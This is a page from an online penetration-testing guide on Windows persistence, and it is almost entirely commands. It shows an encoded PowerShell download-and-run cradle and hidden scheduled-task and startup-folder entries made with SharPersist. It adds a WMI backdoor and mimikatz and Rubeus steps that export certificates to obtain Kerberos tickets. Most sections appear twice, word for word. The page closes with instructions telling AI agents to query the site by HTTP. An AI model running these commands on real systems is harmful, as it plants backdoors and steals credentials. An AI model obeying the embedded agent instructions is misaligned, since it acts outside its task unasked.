# Windows ## Encoding commands In most cases, the commands you want to execute might have special characters, so the best way is to encode them to avoid errors while executing. * **Windows** ```powershell $str = 'IEX ((new-object net.webclient).downloadstring("http:///shell.ps1"))' [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str)) ``` * **Linux** ```powershell str='IEX ((new-object net.webclient).downloadstring("http:///shell.ps1"))' echo -en $str | iconv -t UTF-16LE | base64 -w 0 ``` ## Task Scheduler A task that will be executed hourly. ```powershell .\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc " -n "Updater" -m add -o hourly ``` ## StartUp Folder This command will be executed once the user logs in. ```powershell SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc " -f "UserEnvSetup" -m add ``` ## WMI Create a WMI event subscription that will be executed whenever a process is started. In this case, will be a notepad. ```powershell Import-Module .\PowerLurk.ps1 Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe ``` ## Certificates Certificates are a valuable tool for maintaining persistent access to both users and computers, as they typically have a longer lifespan compared to passwords. User certificates, for instance, are valid for a full year by default, regardless of any password changes made during that period. Unlike password-based access, certificates only become invalid if they are revoked by the issuing Certificate Authority (CA) or if they expire. Additionally, certificate-based access does not rely on any vulnerable templates, making it a reliable option for maintaining access. Attackers can extract already issued certificates or request new ones to continue accessing the target system(s) over an extended period of time. ### User 1\. Enumerate the certificates on the machine ```powershell .\Seatbelt.exe Certificates ``` 2\. Dump the certificates with mimikatz. The pfx certificate password will be "mimikatz" ```powershell .\mimikatz.exe "crypto::certificates /export" "exit" ``` 3\. Base64 encode the pfx file. ```bash cat .pfx | base64 -w 0 ``` 4\. Use Rubeus to obtain a TGT. ```powershell .\Rubeus.exe asktgt /password:mimikatz /nowrap /user:nlamb [/enctype:aes256] /certificate: ``` ### Computer > You must be admin 1\. Extract the machine certificates. ```powershell .\mimikatz.exe "crypto::capi" "crypto::certificates /systemstore:local_machine /export" "exit" ``` 2\. Base64 encode the pfx file. ``` cat .pfx | base64 -w 0 ``` 3\. Request a TGT ```powershell .\Rubeus.exe asktgt /user:$ /enctype:aes256 /password:mimikatz /nowrap /certificate: ``` ## Task Scheduler A task that will be executed hourly. ```powershell .\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc " -n "Updater" -m add -o hourly ``` ## StartUp Folder This command will be executed once the user logs in. ```powershell SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc " -f "UserEnvSetup" -m add ``` ## WMI Create a WMI event subscription that will be executed whenever a process is started. In this case, will be a notepad. ```powershell Import-Module .\PowerLurk.ps1 Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe ``` ## Certificates Certificates are a valuable tool for maintaining persistent access to both users and computers, as they typically have a longer lifespan compared to passwords. User certificates, for instance, are valid for a full year by default, regardless of any password changes made during that period. Unlike password-based access, certificates only become invalid if they are revoked by the issuing Certificate Authority (CA) or if they expire. Additionally, certificate-based access does not rely on any vulnerable templates, making it a reliable option for maintaining access. Attackers can extract already issued certificates or request new ones to continue accessing the target system(s) over an extended period of time. ### User 1\. Enumerate the certificates on the machine ```powershell .\Seatbelt.exe Certificates ``` 2\. Dump the certificates with mimikatz. The pfx certificate password will be "mimikatz" ```powershell .\mimikatz.exe "crypto::certificates /export" "exit" ``` 3\. Base64 encode the pfx file. ```bash cat .pfx | base64 -w 0 ``` 4\. Use Rubeus to obtain a TGT. ```powershell .\Rubeus.exe asktgt /password:mimikatz /nowrap /user:nlamb [/enctype:aes256] /certificate: ``` ### Computer > You must be admin 1. Extract the machine certificates. ```powershell .\mimikatz.exe "crypto::capi" "crypto::certificates /systemstore:local_machine /export" "exit" ``` 2\. Base64 encode the pfx file. ``` cat .pfx | base64 -w 0 ``` 3\. Request a TGT ```powershell .\Rubeus.exe asktgt /user:$ /enctype:aes256 /password:mimikatz /nowrap /certificate: ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://the-pentesting-guide.marmeus.com/persistance/windows.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.